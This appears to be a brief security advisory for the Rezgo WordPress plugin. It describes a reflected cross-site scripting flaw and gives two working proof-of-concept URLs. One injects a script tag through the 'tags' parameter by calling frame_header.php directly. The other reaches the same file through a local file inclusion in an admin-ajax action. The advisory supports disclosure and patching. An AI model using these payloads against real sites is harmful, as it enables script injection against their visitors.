The plugin does not sanitise and escape some parameters before outputting them back in a page, leading to a Reflected Cross-Site Scripting, which can be exploited either via a LFI in an AJAX action, or direct call to the affected file
Direct call: https://example.com/wp-content/plugins/rezgo/rezgo/templates/default/frame_header.php?tags="><script>alert(`xss`)</script> Via the LFI: Once the plugin is configured (can use a dummy “Rezgo Company Code” and “Rezgo API Key” in the “Acccount Information” settings section): http://example.com/wp-admin/admin-ajax.php?action=rezgo&method;=rezgo/templates/default/frame_header&tags;="><script>alert(`xss`)</script>